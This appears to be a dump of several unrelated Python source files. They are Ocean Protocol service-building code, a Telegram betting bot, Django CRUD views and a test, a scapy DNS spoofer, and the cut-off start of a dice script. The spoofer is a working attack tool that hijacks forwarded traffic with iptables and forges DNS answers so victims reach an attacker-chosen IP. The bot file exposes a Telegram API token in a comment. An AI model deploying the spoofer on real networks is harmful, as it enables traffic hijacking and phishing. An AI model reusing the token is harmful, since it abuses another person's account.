ServiceAgreement\nfrom squid_py.agreements.service_agreement_template import ServiceAgreementTemplate\nfrom squid_py.agreements.service_types import ServiceTypes\nfrom squid_py.agreements.utils import get_sla_template_path\nfrom squid_py.ddo.service import Service\nfrom squid_py.did import did_to_id\nfrom squid_py.keeper import Keeper\n\n\nclass ServiceDescriptor(object):\n \"\"\"Tuples of length 2. The first item must be one of ServiceTypes and the second\n item is a dict of parameters and values required by the service\"\"\"\n\n @staticmethod\n def metadata_service_descriptor(metadata, service_endpoint):\n \"\"\"\n Metadata service descriptor.\n\n :param metadata: conforming to the Metadata accepted by Ocean Protocol, dict\n :param service_endpoint: identifier of the service inside the asset DDO, str\n :return: Service descriptor.\n \"\"\"\n return (ServiceTypes.METADATA,\n {'metadata': metadata, 'serviceEndpoint': service_endpoint})\n\n @staticmethod\n def authorization_service_descriptor(service_endpoint):\n \"\"\"\n Authorization service descriptor.\n\n :param service_endpoint: identifier of the service inside the asset DDO, str\n :return: Service descriptor.\n \"\"\"\n return (ServiceTypes.AUTHORIZATION,\n {'serviceEndpoint': service_endpoint})\n\n @staticmethod\n def access_service_descriptor(price, purchase_endpoint, service_endpoint, timeout, template_id):\n \"\"\"\n Access service descriptor.\n\n :param price: Asset price, int\n :param purchase_endpoint: url of the service provider, str\n :param service_endpoint: identifier of the service inside the asset DDO, str\n :param timeout: amount of time in seconds before the agreement expires, int\n :param template_id: id of the template use to create the service, str\n :return: Service descriptor.\n \"\"\"\n return (ServiceTypes.ASSET_ACCESS,\n {'price': price, 'purchaseEndpoint': purchase_endpoint,\n 'serviceEndpoint': service_endpoint,\n 'timeout': timeout, 'templateId': template_id})\n\n @staticmethod\n def compute_service_descriptor(price, purchase_endpoint, service_endpoint, timeout):\n \"\"\"\n Compute service descriptor.\n\n :param price: Asset price, int\n :param purchase_endpoint: url of the service provider, str\n :param service_endpoint: identifier of the service inside the asset DDO, str\n :param timeout: amount of time in seconds before the agreement expires, int\n :return: Service descriptor.\n \"\"\"\n return (ServiceTypes.CLOUD_COMPUTE,\n {'price': price, 'purchaseEndpoint': purchase_endpoint,\n 'serviceEndpoint': service_endpoint,\n 'timeout': timeout})\n\n\nclass ServiceFactory(object):\n \"\"\"Factory class to create Services.\"\"\"\n\n @staticmethod\n def build_services(did, service_descriptors):\n \"\"\"\n Build a list of services.\n\n :param did: DID, str\n :param service_descriptors: List of tuples of length 2. The first item must be one of\n ServiceTypes\n and the second item is a dict of parameters and values required by the service\n :return: List of Services\n \"\"\"\n services = []\n sa_def_key = ServiceAgreement.SERVICE_DEFINITION_ID\n for i, service_desc in enumerate(service_descriptors):\n service = ServiceFactory.build_service(service_desc, did)\n # set serviceDefinitionId for each service\n service.update_value(sa_def_key, str(i))\n services.append(service)\n\n return services\n\n @staticmethod\n def build_service(service_descriptor, did):\n \"\"\"\n Build a service.\n\n :param service_descriptor: Tuples of length 2. The first item must be one of ServiceTypes\n and the second item is a dict of parameters and values required by the service\n :param did: DID, str\n :return: Service\n \"\"\"\n assert isinstance(service_descriptor, tuple) and len(\n service_descriptor) == 2, 'Unknown service descriptor format.'\n service_type, kwargs = service_descriptor\n if service_type == ServiceTypes.METADATA:\n return ServiceFactory.build_metadata_service(\n did,\n kwargs['metadata'],\n kwargs['serviceEndpoint']\n )\n\n elif service_type == ServiceTypes.AUTHORIZATION:\n return ServiceFactory.build_authorization_service(\n kwargs['serviceEndpoint']\n )\n\n elif service_type == ServiceTypes.ASSET_ACCESS:\n return ServiceFactory.build_access_service(\n did, kwargs['price'],\n kwargs['purchaseEndpoint'], kwargs['serviceEndpoint'],\n kwargs['timeout'], kwargs['templateId']\n )\n\n elif service_type == ServiceTypes.CLOUD_COMPUTE:\n return ServiceFactory.build_compute_service(\n did, kwargs['price'],\n kwargs['purchaseEndpoint'], kwargs['serviceEndpoint'], kwargs['timeout']\n )\n\n raise ValueError(f'Unknown service type {service_type}')\n\n @staticmethod\n def build_metadata_service(did, metadata, service_endpoint):\n \"\"\"\n Build a metadata service.\n\n :param did: DID, str\n :param metadata: conforming to the Metadata accepted by Ocean Protocol, dict\n :param service_endpoint: identifier of the service inside the asset DDO, str\n :return: Service\n \"\"\"\n return Service(service_endpoint,\n ServiceTypes.METADATA,\n values={'metadata': metadata},\n did=did)\n\n @staticmethod\n def build_authorization_service(service_endpoint):\n \"\"\"\n Build an authorization service.\n\n :param service_endpoint:\n :return: Service\n \"\"\"\n return Service(service_endpoint, ServiceTypes.AUTHORIZATION,\n values={'service': 'SecretStore'})\n\n @staticmethod\n def build_access_service(did, price, purchase_endpoint, service_endpoint, timeout, template_id):\n \"\"\"\n Build the access service.\n\n :param did: DID, str\n :param price: Asset price, int\n :param purchase_endpoint: url of the service provider, str\n :param service_endpoint: identifier of the service inside the asset DDO, str\n :param timeout: amount of time in seconds before the agreement expires, int\n :param template_id: id of the template use to create the service, str\n :return: ServiceAgreement\n \"\"\"\n # TODO fill all the possible mappings\n param_map = {\n '_documentId': did_to_id(did),\n '_amount': price,\n '_rewardAddress': Keeper.get_instance().escrow_reward_condition.address,\n }\n sla_template_path = get_sla_template_path()\n sla_template = ServiceAgreementTemplate.from_json_file(sla_template_path)\n sla_template.template_id = template_id\n conditions = sla_template.conditions[:]\n for cond in conditions:\n for param in cond.parameters:\n param.value = param_map.get(param.name, '')\n\n if cond.timeout > 0:\n cond.timeout = timeout\n\n sla_template.set_conditions(conditions)\n sa = ServiceAgreement(\n 1,\n sla_template,\n purchase_endpoint,\n service_endpoint,\n ServiceTypes.ASSET_ACCESS\n )\n sa.set_did(did)\n return sa\n\n @staticmethod\n def build_compute_service(did, price, purchase_endpoint, service_endpoint, timeout):\n # TODO: implement this once the compute flow is ready\n return\n","sub_path":"squid_py/agreements/service_factory.py","file_name":"service_factory.py","file_ext":"py","file_size_in_byte":7983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"352331974","text":"# https://tproger.ru/translations/regular-expression-python/\n# каждые 30 секунд запрос GET\n# -забираем все ответы\n# -проверяем слаги в ответах и удаляем выбранные слаги по ходу цикла\n# -если начинается на '!' проверяем time > time in BD\n# \tесли да то пишем в ДИКТ = (id, time, filter,другие настройки)\n\t # и листаем до конца перезаписывая дикт и в конце цикла отправляем дикт в БД\n\t # и отправляем пост с апдейтами\n# отправляем данные по каждому id если такие есть\n\n# функция регисрации бота по нику, возвращает юзер id\n# path = \"https://api.telegram.org/bot778613806:AAE87MOTLo0gwGpJ7we5BWEcWjqDFmkZqZ4/\"\n# -*- coding: utf-8 -*-\nimport requests\nimport datetime as dt\nfrom models import *\nimport re\nimport time\nfrom doc_api import APIKEY as path\nfrom doc_api import STOP as finish\nimport socket\nfrom check_connection import connecting\n\n\n\n\ndef last_time_of_getupdate_Telegram(new_time='0', chat_id='', message=''):\n\t'''if old gettime < new_get_time = False'''\n\twith open('doc_ttime', '+r') as f:\n\t\tlines = f.readlines()\n\t\tif int(lines[-1]) < int(new_time):\n\t\t\tf.write(f'\\n User id: {chat_id} send message: {message} at\\n{new_time}')\n\t\t\treturn False\n\t\telse:\n\t\t\treturn True\n\n\ndef get_telegrams_updates_json(url):\n\ttry:\n\t\tsocket.gethostbyname('google.com')\n\t\tresponse = requests.get(f'{url}getUpdates')\n\t\tprint('models.py def get_telegrams_updates_json: internet is conected')\n\texcept socket.gaierror as e:\n\t\tprint('models.py def get_telegrams_updates_json: NO internet conection', e)\n\t\tprint(e.errno)\n\t\tconnecting()\n\n\ttry:\n\t\tresponse = response.json()['result']\n\t\treturn response\n\texcept KeyError:\n\t\tprint('telebot.py def get_telegrams_updates_json: KEYERROR')\n\t\treturn False\n\texcept UnboundLocalError:\n\t\tprint('telebot.py def get_telegrams_updates_json: UnboundLocalError')\n\t\tconnecting()\n\t\treturn False\n\n\ndef get_chat_id_for_new_user(chat_id, text_message):\n\t'''send chat_id to new user, if user is new'''\n\tuser_data = read_from_Users(user_login=text_message) # try to find user with login = text_message in Users table\n\tif user_data:\n\t\tif user_data.chat_id == '': # if its first request there are no chat_id for new user\n\t\t\tuser_data.chat_id = str(chat_id)\n\t\t\tuser_data.save()\n\t\t\ttext = f'Hello {user_data.login} your id is {chat_id}'\n\t\t\tsend_message(chat_id=chat_id, text=text, url=path)\n\t\telse:\n\t\t\ttext = f'Wow {user_data.login} already has ID'\n\t\t\tsend_message(chat_id=chat_id, text=text, url=path)\n\telse:\n\t\tpass\n\n\ndef send_message(chat_id, text, url):\n\tparams = {'chat_id': chat_id, 'text': f'{text}'}\n\tresponse = requests.post(f'{url}sendMessage', data=params)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\ndef check_comand_time_table(chat_id, time, message, user_conf):\n\t'''all info(chat_id, time, message from getupdate of Telegram)'''\n\ttime_for_time_table = message[4:-1].split('-') # we get time from messege like ['9:00','12:00']\n\tprint('telebot.py def check_comand_time_table : SLICE is ', time_for_time_table)\n\ttime_start = time_for_time_table[0].split(':') # get ['9','00']\n\ttime_finish = time_for_time_table[1].split(':') # get ['12','00']\n\tif (dt.time(int(time_start[0]),int(time_start[1])) < dt.time(int(time_finish[0]), int(time_finish[1]))) and\\\n\t(dt.time(2,59) < dt.time(int(time_start[0]),int(time_start[1])) < dt.time(23,59)) and\\\n\t(dt.time(2,59) < dt.time(int(time_finish[0]), int(time_finish[1])) < dt.time(23,59)): # 2.59 < 9.00<23.59 and 2.59 < 12.00<23.59 and 9.00<12.00\n\t\tuser_conf.start = time_for_time_table[0]\n\t\tuser_conf.finish = time_for_time_table[1]\n\t\tuser_conf.last_date_update_time_table = time\n\t\tuser_conf.save()\n\n\ndef check_comand_filter1(chat_id, time, message, user_conf):\n\tlist_filtres_data = message[1:].split(',') # get list ['td(10-20)','tb(2)']\n\ttd_list = list_filtres_data[0][3:-1].split('-') # get ['10','20']\n\tprint('check comand :',td_list[0], td_list[1])\n\tif int(td_list[0]) < int(td_list[1]):\n\t\tuser_conf.filter_set_main = message[1:]\n\t\tuser_conf.last_date_update_filtr = time\n\t\tuser_conf.save()\n\n\ndef check_slug_answer(user_obj, message):\n\tif ',' in message.strip():\n\t\tlist_message = message.split(',')\n\t\tslug_message = list_message[0]\n\t\tbet_message = list_message[1]\n\telse:\n\t\tslug_message = message\n\t\tbet_message=False\n\tupdate_event_by_slug_and_or_bet(user_obj=user_obj, slug=slug_message, bet=bet_message)\n\n\ndef check_all_or_last_slugs(user_obj, message):\n\n\t# print('In CHECK')\n\tif ',' in message:\n\t\tprint('IN COMA CHECK')\n\t\tlist_message = message.split(',')\n\t\tslug_message = list_message[0].strip()\n\t\tbet_message = list_message[1].strip()\n\t\tprint('slug_message, bet_message', slug_message, bet_message)\n\t\tif slug_message == 'addall':\n\t\t\tprint('telebot.py def check_all_or_last_slugs: ADDALL with BET')\n\t\t\treturn update_all_or_last_events_bet(user_obj, all_slugs=True, last_slugs=False, last_bet=bet_message)\n\t\tif slug_message == 'addlast':\n\t\t\tprint('telebot.py def check_all_or_last_slugs: ADDLAST with BET')\n\t\t\treturn update_all_or_last_events_bet(user_obj, all_slugs=False, last_slugs=True, last_bet=bet_message)\n\telse:\n\t\tprint('IN NO COMA CHECK')\n\t\tslug_message = message.strip()\n\t\tbet_message = ''\n\t\tif slug_message == 'addall':\n\t\t\tprint('telebot.py def check_all_or_last_slugs: ADDALL')\n\t\t\treturn update_all_or_last_events_bet(user_obj, all_slugs=True, last_slugs=False, last_bet=False)\n\t\tif slug_message == 'addlast':\n\t\t\tprint('telebot.py def check_all_or_last_slugs: ADDLAST')\n\t\t\treturn update_all_or_last_events_bet(user_obj, all_slugs=False, last_slugs=True, last_bet=False)\n\n\n\n\ndef new_events_for_users():\n\tjson_events = json_events_and_update_Online_Data_status_to_sent()\n\tif json_events:\n\t\tall_ids = json_events.keys()\n\t\tfor some_user in all_ids:\n\t\t\tfor message in json_events[some_user]:\n\t\t\t\tsend_message(chat_id=some_user, text=message, url=path)\n\n\n\ndef check_comand(chat_id, text_message, time_message, obj_user):\n\tprint(' telebot.py def check_comand :In Check comand for {0} with text = {1}'.format(obj_user.login, text_message))\n\n\tif text_message.strip()[0] == '!': # и больше времени в and chat_id in list_of_Users_id\n\t\tobj_userconf = get_object_UsersConfigs(userlogin='',userchat_id=chat_id)\n\n\t\tif re.match(r'^!tt\\([0-2]?[0-9]:[0-5][0-9]-\\d{1,2}:\\d{1,2}\\)$', text_message.strip()) and\\\n\t\tint(time_message) > int(obj_userconf.last_date_update_time_table): # we check like \"!tt(9:00-19:00)\" and time of last update timetable\n\t\t\tprint('telebot.py def check_comand: settings of timetabele for {0} was changed'.format(obj_user.login))\n\t\t\tcheck_comand_time_table(chat_id=chat_id, time=time_message, message=text_message, user_conf=obj_userconf)\n\t\t\tsend_message(chat_id=chat_id, text=text_message, url=path)\n\n\t\telif re.match(r'^!td\\([0-9]?[0-9]-[0-9]?[0-9]\\),(tb|tm)\\([0-1]?[0-9]\\)$', text_message.strip()) and\\\n\t\tint(time_message) > int(obj_userconf.last_date_update_filtr): # we check time from last messege in Telegram and time of last update of main filter: # we check temlate like \"!td(10-15)tm(5)\" and time of last update\n\t\t\tprint('telebot.py def check_comand: settings of main filter for {0} was changed'.format(obj_user.login))\n\t\t\tcheck_comand_filter1(chat_id=chat_id, time=time_message, message=text_message, user_conf=obj_userconf)\n\t\t\tcreate_new_item_in_Used_Filters(message_filter=text_message, user_chat_id=chat_id)\n\t\t\tsend_message(chat_id=chat_id, text=text_message, url=path)\n\n\t\telif re.match(r'^!\\w{3}\\d{2,6},(p1|p2|tb\\(\\d{1,2}\\)|tm\\(\\d{1,2}\\)|x|1x|2x|12|itb2\\(\\d{1,2}\\)|itb1\\(\\d{1,2}\\)|itb2\\(\\d{1,2}\\)|itm1\\(\\d{1,2}\\)|itm2\\(\\d{1,2}\\))|\\w{3}\\d{2,6}$', text_message.strip()): # we check temlate like \"slag,p1\"\n\t\t\tprint('telebot.py def check_comand: ADD INGAME EVENT WITH SLUG {0} FOR USER {1}'.format(text_message, obj_user.login))\n\t\t\tcheck_slug_answer(user_obj=obj_user, message=text_message[1:])\n\n\t\telif text_message.strip() == '!f1=0':\n\t\t\tprint('telebot.py def check_comand: THE FILTER was DELETED {0} FOR USER {1}'.format(text_message, obj_user.login))\n\t\t\tdell_filter_set_main_UsersConfigs(user_obj=obj_userconf, time=time_message)\n\t\t\tcreate_new_item_in_Used_Filters(message_filter=text_message, user_chat_id=chat_id)\n\t\t\ttext_for_message = f'No filter for you, we stoped searching'\n\t\t\tsend_message(chat_id=chat_id, text=text_for_message, url=path)\n\n\t\telif text_message.strip() == '!f1show':\n\t\t\tprint('telebot.py def check_comand: COMAND SHOW FILTER FOR USER {0}'.format(obj_user.login))\n\t\t\tf1, date_of_f1 = show_filter_set_main_UserConfigs(user_obj=obj_userconf)\n\t\t\ttext_for_message = f'The filter_main is {f1} updated at {date_of_f1}'\n\t\t\tsend_message(chat_id=chat_id, text=text_for_message, url=path)\n\n\t\telif text_message.strip() == '!ttshow':\n\t\t\tprint('telebot.py def check_comand: COMAND SHOW TIME TABLE FOR USER {0}'.format(obj_user.login))\n\t\t\tt_begin, t_finish = show_time_table_UserConfigs(user_obj=obj_userconf)\n\t\t\ttext_for_message = f'We start work at {t_begin} and finish at {t_finish}'\n\t\t\tsend_message(chat_id=chat_id, text=text_for_message, url=path)\n\n\t\telif re.match(r'^!addall|!addall,(p1|p2|tb\\(\\d{1,2}\\)|tm\\(\\d{1,2}\\)|x|1x|2x|12|itb2\\(\\d{1,2}\\)|itb1\\(\\d{1,2}\\)|itb2\\(\\d{1,2}\\)|itm1\\(\\d{1,2}\\)|itm2\\(\\d{1,2}\\))$',text_message.strip()): # !addall or addall,p1\n\t\t\tprint('7')\n\t\t\tif check_all_or_last_slugs(user_obj=obj_user, message=text_message[1:]):\n\t\t\t\ttext_for_message = f'All events have been added in game'\n\t\t\telse:\n\t\t\t\ttext_for_message = f'No events to add'\n\t\t\tsend_message(chat_id=chat_id, text=text_for_message, url=path)\n\n\t\telif re.match(r'^!addlast|!addlast,(p1|p2|tb\\(\\d{1,2}\\)|tm\\(\\d{1,2}\\)|x|1x|2x|12|itb2\\(\\d{1,2}\\)|itb1\\(\\d{1,2}\\)|itb2\\(\\d{1,2}\\)|itm1\\(\\d{1,2}\\)|itm2\\(\\d{1,2}\\))$',text_message.strip()): # !addlast or addall,p1\n\t\t\tprint('8')\n\t\t\tif check_all_or_last_slugs(user_obj=obj_user, message=text_message[1:]):\n\t\t\t\ttext_for_message = f'Last Events have been added in game'\n\t\t\telse:\n\t\t\t\ttext_for_message = f'No last events to add'\n\t\t\tsend_message(chat_id=chat_id, text=text_for_message, url=path)\n\t\telse:\n\t\t\tprint('9')\n\n\n# idd = '319868177'\n# mes = '!addall,p2'\n\n# time='1'\n# us=Users.get(Users.chat_id==idd)\n\n\n\n# check_comand(chat_id=idd, text_message=mes, time_message=time, obj_user=us)\n# Online_Data.update(bet='no').execute()\n\n# new_events_for_users()\n\n\ndef common_filter_of_messages(responses):\n\tif responses:\n\t\tfor response in responses:\n\t\t\tchatid = response['message']['chat']['id']\n\t\t\ttextmessage = response['message']['text']\n\t\t\ttimemessage = response['message']['date']\n\t\t\tnew_time = last_time_of_getupdate_Telegram(new_time=timemessage, chat_id=chatid, message=textmessage)\n\t\t\tif new_time:\n\t\t\t\tcontinue\n\t\t\tif textmessage == finish:\n\t\t\t\treturn 'STOP'\n\t\t\tget_chat_id_for_new_user(chat_id=chatid, text_message=textmessage)\n\t\t\tsome_user = read_from_Users(user_login='',user_chat_id=chatid)\n\t\t\tif some_user:\n\t\t\t\tcheck_comand(chat_id=chatid, text_message=textmessage, time_message=timemessage, obj_user=some_user)\n\n\n\ndef main():\n\twhile True:\n\t\tprint('telebot.py def main: IN LOOP', dt.datetime.now())\n\t\tresp = get_telegrams_updates_json(path)\n\t\tloop = common_filter_of_messages(responses=resp)\n\t\tif loop == 'STOP':\n\t\t\tprint('telebot.py def main: we get STOP message')\n\t\t\tbreak\n\t\tnew_events_for_users() # if in Online_Data are events with status = 'new' then send messages to users\n\t\ttime.sleep(15)\n\n\n# if __name__ == '__main__':\n# \tmain()\n\n\n\n\n\n\n","sub_path":"telebot.py","file_name":"telebot.py","file_ext":"py","file_size_in_byte":11475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"464415409","text":"from django.shortcuts import render, redirect\nfrom app import models\n\n\n# Create your views here.\n\n\n# 程序入口\ndef index(req):\n return render(req, 'index.html')\n\n\n# 班级\n# 展示班级\ndef show_class(req):\n # 展示教室表信息\n # 先拿出教室表中信息\n class_data = models.Class.objects.all()\n # 班级所对的老师\n return render(req, 'show_class.html',\n {\n \"class_data\": class_data,\n })\n\n\n# 增加教室\ndef add_class(req):\n # 接收到post提交的数据后\n if req.method == 'POST':\n # 先将数据拿到,再将数据存入数据库\n class_name = req.POST.get('class_name')\n class_time = req.POST.get('class_time')\n models.Class.objects.create(name=class_name, first_day=class_time)\n # 将数据存入数据库后将展示页面返回\n return redirect('/show_class/')\n # 点击添加按钮的时候弹出添加页面\n return render(req, 'add_class.html')\n\n\n# 删除教室\ndef del_class(req):\n # 点击删除按钮\n # 获取这个按钮所在行的id\n del_id = req.GET.get('id')\n # 删除数据库中此行对应的数据,并将展示页面返回\n models.Class.objects.filter(id=del_id).delete()\n return redirect('/show_class/')\n\n\n# 编辑班级\ndef edit_class(req):\n # 第一次点击编辑按钮的时候出现���辑页面\n # 将原先数据库中的值查出来展现到页面\n edit_id = req.GET.get('id')\n # 第二次提交的时候将获取的数据存入数据库\n if req.method == 'POST':\n # 将数据拿到存入数据库\n class_name = req.POST.get('class_name')\n class_time = req.POST.get('class_time')\n class_obj = models.Class.objects.filter(id=edit_id)[0]\n class_obj.name = class_name\n class_obj.first_day = class_time\n class_obj.save()\n # 将最终的页面展示出来\n return redirect('/show_class/')\n class_obj = models.Class.objects.filter(id=edit_id)[0]\n # 展示页面\n return render(req, 'edit_class.html', {\"class_obj\": class_obj})\n\n\n# 查询班级总学生\ndef class_in_student(req):\n # 点击按钮先拿到该行班级名字\n class_name = req.GET.get('id')\n # 查询出该班级中所有学生\n student_list = models.Class.objects.filter(name=class_name).values(\"student__name\")\n return render(req, 'class_in_student.html', {\"class_name\": class_name, \"student_list\": student_list})\n\n\n# 查询班级老师\ndef class_in_teacher(req):\n # 点击按钮先拿到该行班级名字\n class_name = req.GET.get('id')\n # 查询出该班级中所有老师\n teacher_list = models.Class.objects.filter(name=class_name).values(\"teacher__name\")\n print(teacher_list)\n return render(req, 'class_in_teacher.html', {\"class_name\": class_name, \"teacher_list\": teacher_list})\n\n\n# 学生\n# 展示学生\ndef show_student(req):\n # 拿出学生的所有信息展示到页面\n student_data = models.Student.objects.all()\n class2teacher = models.Teacher.objects.all()\n # 将页面渲染\n return render(req, 'show_student.html', {\"student_data\": student_data, \"class2teacher\": class2teacher})\n\n\n# 添加学生\ndef add_student(req):\n class_list = models.Class.objects.all()\n # 点击添加按钮返回添加页面\n if req.method == 'POST':\n # 将数据拿到存入数据库\n student_name = req.POST.get('student_name')\n class_name_id = req.POST.get('class_name')\n print(class_name_id)\n models.Student.objects.create(name=student_name, class_in_id=class_name_id)\n return redirect('/show_student/')\n return render(req, 'add_student.html', {\"class_list\": class_list})\n\n\n# 删除学生\ndef del_student(req):\n # 获取删除行的id\n del_id = req.GET.get('id')\n # 删除数据库中内容\n models.Student.objects.filter(id=del_id).delete()\n # 展示页面\n return redirect('/show_student/')\n\n\n# 编辑学生\ndef edit_student(req):\n # 点击编辑按钮返回编辑页面\n edit_id = req.GET.get('id')\n class_list = models.Class.objects.all()\n # 数据提交来保存并修改\n if req.method == 'POST':\n # 将数据拿到存入数据库\n student_name = req.POST.get('student_name')\n class_name_id = req.POST.get('class_name')\n student_obj = models.Student.objects.filter(id=edit_id)[0]\n student_obj.name = student_name\n student_obj.class_in_id = class_name_id\n student_obj.save()\n return redirect('/show_student/')\n # 将数据从数据库中拿出返回页面\n student = models.Student.objects.filter(id=edit_id)[0]\n return render(req, 'edit_student.html', {\"class_list\": class_list, \"student\": student})\n\n\n# 老师\n# 展示老师\ndef show_teacher(req):\n # 将教师和教室信息从数据库拿出来展示在页面\n class_list = models.Class.objects.all()\n teacher_list = models.Teacher.objects.all()\n # 展示页面\n return render(req, 'show_teacher.html', {'class_list': class_list, \"teacher_list\": teacher_list})\n\n\n# 添加老师\ndef add_teacher(req):\n # 进入添加页面后点击添加按钮将数据存入数据库\n if req.method == 'POST':\n teacher_name = req.POST.get('teacher_name')\n class_name = req.POST.getlist('class_name')\n # 将数据存入数据库\n teacher_obj = models.Teacher.objects.create(name=teacher_name)\n teacher_obj.teacher2class.set(class_name)\n # 返回页面\n return redirect('/show_teacher/')\n # 点击添加按钮将教室名字展示出来供选择\n # 拿出所有教室\n class_list = models.Class.objects.all()\n return render(req, 'add_teacher.html', {'class_list': class_list})\n\n\n# 删除老师\ndef del_teacher(req):\n # 拿到删除行的id\n del_id = req.GET.get('id')\n # 将数据库中这行数据删除\n models.Teacher.objects.filter(id=del_id).delete()\n # 返回删除后页面\n return redirect('/show_teacher/')\n\n\n# 编辑老师\ndef edit_teacher(req):\n # 先将老师这行数据展示\n edit_id = req.GET.get('id')\n # 拿到此行对应的数据\n teacher_obj = models.Teacher.objects.filter(id=edit_id)[0]\n # 拿到所有教室\n class_list = models.Class.objects.all()\n # 将编辑好的数据发来\n if req.method == \"POST\":\n # 拿到发来的数据\n teacher_name = req.POST.get('teacher_name')\n class_name = req.POST.getlist('class_name')\n # 存入数据库\n teacher_obj.name = teacher_name\n teacher_obj.save()\n teacher_obj.teacher2class.set(class_name)\n # 返回展示页面\n return redirect('/show_teacher/')\n # 返回展示页面\n return render(req, 'edit_teacher.html', {'teacher_obj': teacher_obj, \"class_list\": class_list})\n","sub_path":"pro_two/mysite/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"229596092","text":"from django.contrib.auth import get_user_model\nfrom django.contrib.auth.models import Group\nfrom django.test import TestCase, Client\n\nfrom my_web_project.main.models import Homework, Student\n\nUserModel = get_user_model()\n\n\nclass HomeworkDetailsTests(TestCase):\n def setUp(self):\n self.client = Client()\n self.user = UserModel.objects.create_user(username='student101', password='q1w2e3r4!')\n self.group_student = Group(name='Student')\n self.group_student.save()\n self.user.groups.add(self.group_student)\n self.student = Student.objects.get(pk=1)\n\n Homework.objects.create(\n title=\"My test homework\",\n student=self.student,\n upload='homeworks/Homework-_History_1.docx'\n\n )\n\n def test_homeworkDetailsOpens_successfully(self):\n self.client.force_login(self.user)\n\n response = self.client.get('/homeworks/details/1')\n\n self.assertEqual(response.status_code, 200)\n","sub_path":"tests/main/views/test_homework_detail.py","file_name":"test_homework_detail.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"333102675","text":"#import libraries and modules\nimport subprocess\nimport optparse\nimport scapy.all as scapy\n\ntry:\n import netfilterqueue\nexcept:\n subprocess.call([\"pip3\",\"install\", \"-U\", \"git+https://github.com/kti/python-netfilterqueue\"])\n import netfilterqueue\n\n#runs bash-command: 'iptables _i FORWARD -j NFQUEUE --queue-num 666'\n#FORWARD: is the default queue to which packets, being routed through own machine, are passed\n #alternative: INPUT OUTPUT: is the default queue to which pachets leaving own computer / or coming in to own computer are passed\n#NFQUEUE: allows to put packet in any queue specified by the queue-number - here: this one is created and now packets from FORWARD will be saved here\n#queue-num: is the queue number for the newly created NFQUEUE - this number can be chosen at random from 0 - 65535\n# -I: a command, that inserts one or more rules in the selected chain\n# -j: specifies the target of the rule (-here: the rule inserted using '-I')\ndef get_args():\n '''\n Get command line arguments\n '''\n\n parser = optparse.OptionParser()\n parser.add_option(\"-o\", \"--packet-origin\", dest=\"packet_origin\", default=\"remote\",help=\"Origin of packets: can be 'own' or 'remote'\")\n\n (options, _) = parser.parse_args()\n\n if (options.packet_origin != \"own\") and (options.packet_origin != \"remote\"):\n parser.error(\"[-] Specify the origin of the packets using '-o ' or use '--help' for more info\")\n quit()\n else:\n return options.packet_origin\n\ndef process_packet(packet):\n scapy_packet = scapy.IP(packet.get_payload()) #draping the original packet into a scapy-IP-layer wil automatically convert it into a scapy packet\n if scapy_packet.haslayer(scapy.DNSRR): #RR - response; RQ - request\n qname = scapy_packet[scapy.DNSQR].qname.decode() # get name of targeted website from DNS REQUEST [=scapy.DNSRQ]; form [].\n if \"stackoverflow\" in qname:\n print(\"[+] Targeting the victim...\\n\") #print payload contained in packet\n answer = scapy.DNSRR(rrname=qname, rdata=\"10.0.2.15\") # creates a pDNS response qith qname of target, but IP address customly selected by 'rdata'; NOTE: scpay will fill in all other field by itself - rrname and rdata are the only 2 fields that scapy can NOT determine by itself\n scapy_packet[scapy.DNS].an = answer #replace DNS response in scpay_packet; [scapy.DNSRR] and [scapy.DNS].an both point to the DNA Response part of the packet\n scapy_packet[scapy.DNS].ancount = 1 # modify count of answers sent from x to 1 (becasue we just add 1 to the modified packet\n\n #delete length and checksxum information (fields) in 'scpay_package', so that it does not corrupt the modified package\n # --> scapy will automatically recalculate these fields and fill them in, based on the odifications\n del scapy_packet[scapy.IP].len\n del scapy_packet[scapy.IP].chksum\n del scapy_packet[scapy.UDP].len\n del scapy_packet[scapy.UDP].chksum\n\n packet.set_payload(bytes(scapy_packet)) # change original packet to modified scapy packet string\n print(packet)\n else:\n print(\"Not a DNS response packet.\")\n packet.accept() #forwards packet to its destination; using 'packet.drop()' will drop the packet and cut the internet connection of the client\n\n\nprint(\"===================\")\nprint(\"Starting DNS spoofer\")\nprint(\"===================\")\n\npacket_origin = get_args()\n\nif packet_origin == \"remote\":\n subprocess.call([\"iptables\", \"-I\", \"FORWARD\", \"-j\", \"NFQUEUE\", \"--queue-num\", \"666\"])\nelif packet_origin == \"own\":\n subprocess.call([\"iptables\", \"-I\", \"OUTPUT\", \"-j\", \"NFQUEUE\", \"--queue-num\", \"666\"])\n subprocess.call([\"iptables\", \"-I\", \"INPUT\", \"-j\", \"NFQUEUE\", \"--queue-num\", \"666\"])\n\ntry:\n queue = netfilterqueue.NetfilterQueue() # object that is going to interact with queue 666 created above\n queue.bind(666, process_packet) # binds variable 'queue' to 666 and executes a function on every packet in the queue\n queue.run()\nexcept KeyboardInterrupt:\n print(\"Shutting down program...\")\n print(\"Flushing IP Tables...\")\n subprocess.run([\"iptables\",\"--flush\"])\n print(\"IP Tables successfully reset.\")\n exit()\n\n","sub_path":"DNS_spoofer/dns_spoof.py","file_name":"dns_spoof.py","file_ext":"py","file_size_in_byte":4294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"188401639","text":"'''\n //============================================================================\n // Name : fair_dice.py\n // Author : James Kasakyan, Fall 2015\n // Version : 1.0\n // Description : See readme.txt\n //============================================================================\n'''\n\nfrom random import random\n\n\n# Given a list of dice roll probabilities for a six sided dice, an integer value for number of tosses, and an integer value for desired\n# number of fair tosses, will return a dictionary of fair rolls where each Pn ~ 1/6 = .1666666666 assuming large enough values for\n# num_tosses and fair_rolls_to_produce\n\ndef fair_dice(probability_list, num_tosses, fair_rolls_to_produce):\n\n fair_roll_dictionary = {\n \"P0\": 0,\n \"P1\": 0,\n \"P2\": 0,\n \"P3\": 0,\n \"P4\": 0,\n \"P5\": 0\n }\n for x in range(0,fair_rolls_to_produce):\n\n dice_list = produce_rolls(probability_list, num_tosses)\n sum_dice = 0\n for i in range (0,6):\n sum_dice += (i * 